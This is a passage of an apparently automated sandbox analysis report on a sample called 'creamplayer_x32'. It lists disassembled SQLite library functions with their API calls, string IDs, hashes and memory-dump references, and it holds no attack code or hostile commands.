                                                                                                    • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                                                                    • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                    • String ID:
                                                                                                    • API String ID: 3556715608-0
                                                                                                    • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                    • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                                                                    • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                                                                    • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6095F686
                                                                                                      • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                                                                    • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                                                                    • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1866449048-0
                                                                                                    • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                    • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                                                                    • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                                                                    • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                                                                    APIs
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                                                                      • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60940808
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60940816
                                                                                                    • sqlite3_finalize.SQLITE3 ref: 60940824
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094082C
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 14011187-0
                                                                                                    • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                                    • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                                                                    • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                                                                    • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                                                                    • API String ID: 0-780898
                                                                                                    • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                    • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                                                                    • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                                                                    • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                                                                    • API String ID: 0-2604012851
                                                                                                    • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                    • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                                                                    • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                                                                    • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                                                                    • String ID: 0$SQLite format 3
                                                                                                    • API String ID: 3174206576-3388949527
                                                                                                    • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                    • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                                                                    • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                                                                    • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F180
                                                                                                      • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                                                                      • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                                                                    • String ID: |
                                                                                                    • API String ID: 1576672187-2343686810
                                                                                                    • Opcode ID: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                    • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                                                                    • Opcode Fuzzy Hash: 45796efa6547682f16092b9fa288c01422e20de86ab54653b6df12e990b05c38
                                                                                                    • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                                                                    APIs
                                                                                                    • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                                                                    • sqlite3_free.SQLITE3 ref: 60953842
                                                                                                    • sqlite3_free.SQLITE3 ref: 6095387C
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                                                                    • String ID: 6$timeout
                                                                                                    • API String ID: 2671017102-3660802998
                                                                                                    • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                                                    • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                                                                    • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                                                                    • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                                                                    APIs
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                                                                      • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                                                                    • String ID: $)><$sqlite_master$sqlite_temp_master
                                                                                                    • API String ID: 652164897-1572359634
                                                                                                    • Opcode ID: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                    • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                                                                    • Opcode Fuzzy Hash: 7664a015b2dc01db37cf12657f922778db359f6c70a1ba93bfebbfbe3581116b
                                                                                                    • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 2352520524-0
                                                                                                    • Opcode ID: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                    • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                                                                    • Opcode Fuzzy Hash: bf61c68f4ce88464188c3b4ec21cbec410585f797eaf5b0aff599f1fc01aebfc
                                                                                                    • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                                                                    APIs
                                                                                                      • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                                      • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                                      • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                                                                      • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                                                                      • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                      • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                      • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A523
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A554
                                                                                                    • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                                    • String ID: optimize
                                                                                                    • API String ID: 3659050757-3797040228
                                                                                                    • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                    • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                                                                    • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                                                                    • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                                                                    APIs
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60965556
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609655B8
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 60965655
                                                                                                    • sqlite3_free.SQLITE3 ref: 60965714
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096574B
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_free.SQLITE3 ref: 609657AA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2722129401-0
                                                                                                    • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                    • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                                                                    • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                                                                    • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                                                                      • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                                                                    • sqlite3_free.SQLITE3 ref: 609647C5
                                                                                                      • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096476B
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    • sqlite3_free.SQLITE3 ref: 6096477B
                                                                                                    • sqlite3_free.SQLITE3 ref: 60964783
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
